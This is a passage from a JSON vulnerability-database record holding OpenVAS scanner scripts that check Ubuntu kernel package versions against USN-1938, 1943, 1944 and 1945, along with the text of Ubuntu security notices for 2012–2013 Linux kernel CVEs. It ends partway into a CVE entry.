be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841542\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:37:22 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1944-1\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 12.10\");\n script_tag(name:\"insight\", value:\"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"1944-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1944-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.10\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-generic\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-highbank\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-omap\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-powerpc-smp\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-40-powerpc64-smp\", ver:\"3.5.0-40.62\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:21:30", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "Check for the Version of linux-ti-omap4", "modified": "2017-12-01T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:841546", "href": "http://plugins.openvas.org/nasl.php?oid=841546", "type": "openvas", "title": "Ubuntu Update for linux-ti-omap4 USN-1945-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1945_1.nasl 7958 2017-12-01 06:47:47Z santu $\n#\n# Ubuntu Update for linux-ti-omap4 USN-1945-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(841546);\n script_version(\"$Revision: 7958 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:47:47 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:41:44 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2012-5374\", \"CVE-2012-5375\", \"CVE-2013-1060\", \"CVE-2013-2140\",\n \"CVE-2013-2232\", \"CVE-2013-2234\", \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-ti-omap4 USN-1945-1\");\n\n tag_insight = \"A denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service by creating a\nlarge number of files with names that have the same CRC32 hash value.\n(CVE-2012-5374)\n\nA denial of service flaw was discovered in the Btrfs file system in the\nLinux kernel. A local user could cause a denial of service (prevent file\ncreation) for a victim, by creating a file with a specific CRC32C hash\nvalue in a directory important to the victim. (CVE-2012-5375)\n\nVasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\";\n\n tag_affected = \"linux-ti-omap4 on Ubuntu 12.10\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"USN\", value: \"1945-1\");\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1945-1/\");\n script_summary(\"Check for the Version of linux-ti-omap4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.5.0-232-omap4\", ver:\"3.5.0-232.48\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-09-06T00:00:00", "id": "OPENVAS:1361412562310841540", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841540", "type": "openvas", "title": "Ubuntu Update for linux USN-1938-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1938_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux USN-1938-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841540\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-06 09:37:32 +0530 (Fri, 06 Sep 2013)\");\n script_cve_id(\"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\",\n \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux USN-1938-1\");\n\n script_tag(name:\"affected\", value:\"linux on Ubuntu 13.04\");\n script_tag(name:\"insight\", value:\"Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local could exploit this flaw to run\ncommands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides a guest OS read-only access to disks that support TRIM or SCSI\nUNMAP. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. A unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in the setsockopt UDP_CORK option\nin the Linux kernel's IPv6 stack. A local user could exploit this flaw to\ncause a denial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"1938-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1938-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU13\\.04\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU13.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-30-generic\", ver:\"3.8.0-30.44\", rls:\"UBUNTU13.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:03", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2013-09-12T00:00:00", "id": "OPENVAS:1361412562310841549", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310841549", "type": "openvas", "title": "Ubuntu Update for linux-lts-raring USN-1943-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1943_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for linux-lts-raring USN-1943-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.841549\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-12 11:47:44 +0530 (Thu, 12 Sep 2013)\");\n script_cve_id(\"CVE-2013-1060\", \"CVE-2013-2140\", \"CVE-2013-2232\", \"CVE-2013-2234\",\n \"CVE-2013-4162\", \"CVE-2013-4163\");\n script_tag(name:\"cvss_base\", value:\"6.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu Update for linux-lts-raring USN-1943-1\");\n\n script_tag(name:\"affected\", value:\"linux-lts-raring on Ubuntu 12.04 LTS\");\n script_tag(name:\"insight\", value:\"Vasily Kulikov discovered a flaw in the Linux Kernel's perf tool that\nallows for privilege escalation. A local user could exploit this flaw to\nrun commands as root when using the perf tool. (CVE-2013-1060)\n\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\nguest OS. A privileged user in the guest OS could exploit this flaw to\ndestroy data on the disk, even though the guest OS should not be able to\nwrite to the disk. (CVE-2013-2140)\n\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\nconnect to an IPv4 destination. An unprivileged local user could exploit\nthis flaw to cause a denial of service (system crash). (CVE-2013-2232)\n\nAn information leak was discovered in the IPSec key_socket implementation\nin the Linux kernel. An local user could exploit this flaw to examine\npotentially sensitive information in kernel memory. (CVE-2013-2234)\n\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\nLinux kernel's IPv6 stack. A local user could exploit this flaw to cause a\ndenial of service (system crash). (CVE-2013-4162)\n\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\nkernel when the IPV6_MTU setsockopt option has been specified in\ncombination with the UDP_CORK option. A local user could exploit this flaw\nto cause a denial of service (system crash). (CVE-2013-4163)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"USN\", value:\"1943-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1943-1/\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-lts-raring'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU12\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.8.0-30-generic\", ver:\"3.8.0-30.44~precise1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "cvelist": ["CVE-2013-2234", "CVE-2013-4162", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-4163", "CVE-2013-2140", "CVE-2012-5375", "CVE-2012-5374"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1944-1\r\nSeptember 06, 2013\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 12.10\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nA denial of service flaw was discovered in the Btrfs file system in the\r\nLinux kernel. A local user could cause a denial of service by creating a\r\nlarge number of files with names that have the same CRC32 hash value.\r\n&#40;CVE-2012-5374&#41;\r\n\r\nA denial of service flaw was discovered in the Btrfs file system in the\r\nLinux kernel. A local user could cause a denial of service &#40;prevent file\r\ncreation&#41; for a victim, by creating a file with a specific CRC32C hash\r\nvalue in a directory important to the victim. &#40;CVE-2012-5375&#41;\r\n\r\nVasily Kulikov discovered a flaw in the Linux Kernel&#39;s perf tool that\r\nallows for privilege escalation. A local user could exploit this flaw to\r\nrun commands as root when using the perf tool. &#40;CVE-2013-1060&#41;\r\n\r\nA flaw was discovered in the Xen subsystem of the Linux kernel when it\r\nprovides read-only access to a disk that supports TRIM or SCSI UNMAP to a\r\nguest OS. A privileged user in the guest OS could exploit this flaw to\r\ndestroy data on the disk, even though the guest OS should not be able to\r\nwrite to the disk. &#40;CVE-2013-2140&#41;\r\n\r\nA flaw was discovered in the Linux kernel when an IPv6 socket is used to\r\nconnect to an IPv4 destination. An unprivileged local user could exploit\r\nthis flaw to cause a denial of service &#40;system crash&#41;. &#40;CVE-2013-2232&#41;\r\n\r\nAn information leak was discovered in the IPSec key_socket implementation\r\nin the Linux kernel. An local user could exploit this flaw to examine\r\npotentially sensitive information in kernel memory. &#40;CVE-2013-2234&#41;\r\n\r\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\r\nLinux kernel&#39;s IPv6 stack. A local user could exploit this flaw to cause a\r\ndenial of service &#40;system crash&#41;. &#40;CVE-2013-4162&#41;\r\n\r\nHannes Frederic Sowa discovered a flaw in the IPv6 subsystem of the Linux\r\nkernel when the IPV6_MTU setsockopt option has been specified in\r\ncombination with the UDP_CORK option. A local user could exploit this flaw\r\nto cause a denial of service &#40;system crash&#41;. &#40;CVE-2013-4163&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 12.10:\r\n linux-image-3.5.0-40-generic 3.5.0-40.62\r\n linux-image-3.5.0-40-highbank 3.5.0-40.62\r\n linux-image-3.5.0-40-omap 3.5.0-40.62\r\n linux-image-3.5.0-40-powerpc-smp 3.5.0-40.62\r\n linux-image-3.5.0-40-powerpc64-smp 3.5.0-40.62\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages &#40;e.g. linux-generic,\r\nlinux-server, linux-powerpc&#41;, a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1944-1\r\n CVE-2012-5374, CVE-2012-5375, CVE-2013-1060, CVE-2013-2140,\r\n CVE-2013-2232, CVE-2013-2234, CVE-2013-4162, CVE-2013-4163\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/3.5.0-40.62\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2013-09-09T00:00:00", "published": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29790", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29790", "title": "[USN-1944-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-2234", "CVE-2013-2896", "CVE-2013-2206", "CVE-2013-2898", "CVE-2013-1819", "CVE-2013-1943", "CVE-2013-4254", "CVE-2013-2892", "CVE-2013-4162", "CVE-2013-1059", "CVE-2013-4300", "CVE-2013-1060", "CVE-2013-2232", "CVE-2013-2851", "CVE-2013-4163", "CVE-2013-2899", "CVE-2013-2140", "CVE-2013-4205", "CVE-2012-5375", "CVE-2013-0343", "CVE-2013-2888", "CVE-2013-2164", "CVE-2012-5374"], "description": "Privilege escalations, information leakages, DoS conditions.", "edition": 1, "modified": "2013-10-28T00:00:00", "published": "2013-10-28T00:00:00", "id": "SECURITYVULNS:VULN:13265", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13265", "title": "Linux kernel mulriple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:49", "bulletinFamily": "software", "cvelist": ["CVE-2013-2206", "CVE-2013-1943", "CVE-2013-4162", "CVE-2013-1060"], "description": "\r\n\r\n==========================================================================\r\nUbuntu Security Notice USN-1939-1\r\nSeptember 06, 2013\r\n\r\nlinux vulnerabilities\r\n==========================================================================\r\n\r\nA security issue affects these releases of Ubuntu and its derivatives:\r\n\r\n- Ubuntu 10.04 LTS\r\n\r\nSummary:\r\n\r\nSeveral security issues were fixed in the kernel.\r\n\r\nSoftware Description:\r\n- linux: Linux kernel\r\n\r\nDetails:\r\n\r\nVasily Kulikov discovered a flaw in the Linux Kernel&#39;s perf tool that\r\nallows for privilege escalation. A local user could exploit this flaw to\r\nrun commands as root when using the perf tool.\r\n&#40;CVE-2013-1060&#41;\r\n\r\nMichael S. Tsirkin discovered a flaw in how the Linux kernel&#39;s KVM\r\nsubsystem allocates memory slots for the guest&#39;s address space. A local\r\nuser could exploit this flaw to gain system privileges or obtain sensitive\r\ninformation from kernel memory. &#40;CVE-2013-1943&#41;\r\n\r\nA flaw was discovered in the SCTP &#40;stream control transfer protocol&#41;\r\nnetwork protocol&#39;s handling of duplicate cookies in the Linux kernel. A\r\nremote attacker could exploit this flaw to cause a denial of service\r\n&#40;system crash&#41; on another remote user querying the SCTP connection.\r\n&#40;CVE-2013-2206&#41;\r\n\r\nHannes Frederic Sowa discovered a flaw in setsockopt UDP_CORK option in the\r\nLinux kernel&#39;s IPv6 stack. A local user could exploit this flaw to cause a\r\ndenial of service &#40;system crash&#41;. &#40;CVE-2013-4162&#41;\r\n\r\nUpdate instructions:\r\n\r\nThe problem can be corrected by updating your system to the following\r\npackage versions:\r\n\r\nUbuntu 10.04 LTS:\r\n linux-image-2.6.32-51-386 2.6.32-51.113\r\n linux-image-2.6.32-51-generic 2.6.32-51.113\r\n linux-image-2.6.32-51-generic-pae 2.6.32-51.113\r\n linux-image-2.6.32-51-ia64 2.6.32-51.113\r\n linux-image-2.6.32-51-lpia 2.6.32-51.113\r\n linux-image-2.6.32-51-powerpc 2.6.32-51.113\r\n linux-image-2.6.32-51-powerpc-smp 2.6.32-51.113\r\n linux-image-2.6.32-51-powerpc64-smp 2.6.32-51.113\r\n linux-image-2.6.32-51-preempt 2.6.32-51.113\r\n linux-image-2.6.32-51-server 2.6.32-51.113\r\n linux-image-2.6.32-51-sparc64 2.6.32-51.113\r\n linux-image-2.6.32-51-sparc64-smp 2.6.32-51.113\r\n linux-image-2.6.32-51-versatile 2.6.32-51.113\r\n linux-image-2.6.32-51-virtual 2.6.32-51.113\r\n\r\nAfter a standard system update you need to reboot your computer to make\r\nall the necessary changes.\r\n\r\nATTENTION: Due to an unavoidable ABI change the kernel updates have\r\nbeen given a new version number, which requires you to recompile and\r\nreinstall all third party kernel modules you might have installed. If\r\nyou use linux-restricted-modules, you have to update that package as\r\nwell to get modules which work with the new kernel version. Unless you\r\nmanually uninstalled the standard kernel metapackages &#40;e.g. linux-generic,\r\nlinux-server, linux-powerpc&#41;, a standard system upgrade will automatically\r\nperform this as well.\r\n\r\nReferences:\r\n http://www.ubuntu.com/usn/usn-1939-1\r\n CVE-2013-1060, CVE-2013-1943, CVE-2013-2206, CVE-2013-4162\r\n\r\nPackage Information:\r\n https://launchpad.net/ubuntu/+source/linux/2.6.32-51.113\r\n\r\n\r\n\r\n\r\n-- ubuntu-security-announce mailing list ubuntu-security-announce@lists.ubuntu.com Modify settings or unsubscribe at: https://lists.ubuntu.com/mailman/listinfo/ubuntu-security-announce\r\n\r\n", "edition": 1, "modified": "2013-09-09T00:00:00", "published": "2013-09-09T00:00:00", "id": "SECURITYVULNS:DOC:29791", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:29791", "title": "[USN-1939-1] Linux kernel vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "cve": [{"lastseen": "2021-02-02T05:59:56", "description": "The CRC32C feature in the Btrfs implementation in the Linux kernel before 3.8-rc1 allows local users to cause a denial of service (extended runtime of kernel code) by creating many different files whose names are associated with the same CRC32C hash value.", "edition": 4, "cvss3": {}, "published": "2013-02-18T11:56:00", "title": "CVE-2012-5374", "type": "cve", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": 